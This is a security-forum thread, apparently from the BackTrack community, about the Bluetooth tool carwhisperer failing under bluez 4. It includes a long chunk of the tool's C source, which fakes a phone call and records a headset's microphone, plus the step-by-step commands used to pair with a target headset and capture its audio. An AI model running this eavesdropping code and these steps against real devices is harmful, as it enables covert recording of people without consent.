Could you post the commands you used and their output to include error messages?
Maybe we can either help or get it fixed.
Thanks.
[NOT WORKING] Carwhisperer
In BT4 because of the new bluetooth stack (bluez 4 instead of bluez 3.x) the tool carwhisperer doesn't work anymore.
It is possible to start it, it will connect to the headset (if default PIN was set correctly), but it doesn't record anything (it fills up the output file with zeros).
Maybe I screwed up something with the settings (however this is highly unlikely), but you know too that bluez 4 has no documentation at all, so figuring out how to change settings is really difficult.
I would highly recommend (if the newer kernel still makes this possible) to return to bluez 3.x.
Thank you,
DOMy
127.0.0.1 sweety 127.0.0.1???
Home, sweety home
-by HK!
Re: [NOT WORKING] Carwhisperer
Could you post the commands you used and their output to include error messages?
Maybe we can either help or get it fixed.
Thanks.
To be successful here you should read all of the following.
ForumRules
ForumFAQ
If you are new to Back|Track
Back|Track Wiki
Failure to do so will probably get your threads deleted or worse.
Well, it is pretty easy: setting up the default passkey is not possible (hcid.conf is missing), this could be fixed by using some Python script I found on the net. After that, it is able to connect to the BT headset (no more Access denied message), but recording doesn't work, all we got is noise (after SOX postprocessing).Originally Posted by Archangel-Amael
I will look into the source code sometime, but maybe you can find out why this happens.
EDIT2:
Howto Install Carwhisperer on Ubuntu 9.10
This might help, I will test it ASAP, if yes then please include the simple-agent and a short README file in the next Backtrack please.
EDIT3-final:
Well, I checked some stuff, and now I am able to connect to the headset, but all we got as replies are zeros, hcidump shows nicely how all the incoming packets contain only zeros, not valid data.
I tried to send out a test file, and see it it gets played back on the headset, but no luck with that either. It seems that somehow between the stack and the actual hardware some stuff simply disappears or gets cut out or I don't know.
To be short and simple: this part of the carwhisperer code fails with bluez-4 but it does work with bluez-3 (tested):
Thanks,Code:// turn up the speaker volume and the microphone gain to the highest level wlen = write(rd, "AT+VGS=15\r\n", 11); wlen = write(rd, "AT+VGM=15\r\n", 11); // send 'RING' message in order to initiate fake phone call wlen = write(rd, "RING\r\n", 6); maxfd = (rd > sd) ? rd : sd; while (!terminate) { FD_ZERO(&rfds); FD_SET(rd, &rfds); FD_SET(sd, &rfds); timeout.tv_sec = 2; timeout.tv_usec = 0; if ((sel = select(maxfd + 1, &rfds, NULL, NULL, &timeout)) > 0) { if ((FD_ISSET(rd, &rfds))&&(scostarted!=0)) { memset(buf, 0, sizeof(buf)); rlen = read(rd, buf, sizeof(buf)); //buf[rlen++] = '\0'; if (rlen > 0) { fprintf(stderr, "got: %s\n",buf); if (strncmp(buf, "AT+BRSF=",8)==0) { wlen=write(rd,"+BRSF: 63\r\n",11); fprintf(stderr, "ansewered: +BRSF: 63\n"); } else if (strncmp(buf, "AT+CIND?",8)==0) { wlen=write(rd,"+CIND: 0,1,0,0\r\n",16); fprintf(stderr, "ansewered: +CIND: 1\n"); } else if (strncmp(buf, "AT+CIND=?",9)==0) { wlen=write(rd,"+CIND: (\"call\",(0,1)),(\"service\",(0,1)),(\"call_setup\",(0-3)),(\"callsetup\",(0-3))\r\n",82); fprintf(stderr, "ansewered: +CIND: (\"call\",(0,1)),(\"service\",(0,1)),(\"call_setup\",(0-3)),(\"callsetup\",(0-3))\n"); } else { // answer to anything else with an 'OK' wlen = write(rd, "OK\r\n", 4); fprintf(stderr, "ansewered: OK\n"); } } else { // check return value of read call if (rlen==-1) { // terminate loop wlen = write(rd, "AT+VGM=15\r\n", 11); terminate=1; } } } if (FD_ISSET(sd, &rfds)) { scostarted=1; memset(buf, 0, sizeof(buf)); rlen = read(sd, buf, sizeof(buf)); if (rlen > 0) { wlen = write(fdo, buf, rlen); rlen = read(fdi, buf, rlen); wlen = 0; if (rlen > 0) p = buf; while (rlen > sco_mtu) { wlen += write(sd, p, sco_mtu); rlen -= sco_mtu; p += sco_mtu; } wlen += write(sd, p, rlen); } } if (cnt++>800) { // keep tuning up the volume for speaker and microphone wlen = write(rd, "RING\r\n", 6); wlen = write(rd, "AT+VGS=15\r\n", 11); wlen = write(rd, "AT+VGM=15\r\n", 11); cnt=0; printf(".\n"); } } } // close sockets close(sd); close(rd); // close files close(fdi); close(fdo); return 0; }
DOMy
Last edited by domi007; 10-10-2010 at 08:58 PM.
127.0.0.1 sweety 127.0.0.1???
Home, sweety home
-by HK!
Re: [NOT WORKING] Carwhisperer
BUMP, no one does any Bluetooth hacking here? Please, someone?
127.0.0.1 sweety 127.0.0.1???
Home, sweety home
-by HK!
Re: [NOT WORKING] Carwhisperer
Don't do that. Ever.
You didn't provide all of what Amael asked for, we see no output to commands. Try complying with a request so that we can help you.
Without any assistance from you, that big chunk of select code is useless to us. I can't say if it's a service= issue or a service issue, or whether or not the software is even associating correctly or just bailing down to saving blanks.
Again, help us to help you.
Still not underestimating the power...
There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.
OKay, you are right, here are my steps:
hciconfig hci0 up
hciconfig
(shows my BT dongle is up and running)
hcitool scan
(got my headsets BD address)
/etc/init.d/bluetooth restart
Stopping bluetoothd
Starting bluetoothd
#Following the instructions found on Howto Install Carwhisperer on Ubuntu 9.10
wget http://mediakey.dk/~cc/files/simple-agent
# Kill the existing passkey agent
pkill -9 bluetooth-applet
chmod +x simple-agent
./simple-agent
Agent is running
Opening a new shell tab:
cd /pentest/bluetooth/carwhisperer
./carwhisperer hci0 message.raw out.raw <my headset's bd-address> 2
(message.raw is an empty file, which I made using nano)
Voice setting: 0x0060
RFCOMM channel connected
SCO audio channel connected (handle 45, mtu 64)
The out.raw file contains only zeros. Also note that when carhisperer sniffs real data it prints a dot and a newline character on the screen like this:
Voice setting: 0x0060
RFCOMM channel connected
SCO audio channel connected (handle 45, mtu 64)
.
.
.
.
Under bt3 and bluez3 it did work perfectly. All I had to do is change some settings in the hcid.conf and restart the hci daemon. The changes I made were: auto authentication (or security mode or whatever it's called), pin 0000, lm mode MASTER, ACCEPT, class 0x050204 (phone).
I am currently trying to change the class and the LM mode with hcitool, so far no success.
mod: Finally changed the class and the lm mode, same result: only zeros in the output file.
Thanks for your help,
appreciate it a lot,
DOMy
I looked into things with hcidump and it seems that the headset is sending only zeroes, I don't know why, maybe it is a low level problem directly related to the BT stack.
Will continue researching the issue, but need some other people too, so please help me
DOMy
Last edited by Archangel-Amael; 10-14-2010 at 07:20 PM.
127.0.0.1 sweety 127.0.0.1???
Home, sweety home
-by HK!
Re: [NOT WORKING] Carwhisperer
Nobody?
I guess than I will have to make my own distribution for hacking...well whatever
127.0.0.1 sweety 127.0.0.1???
Home, sweety home
-by HK!
Posting Permissions
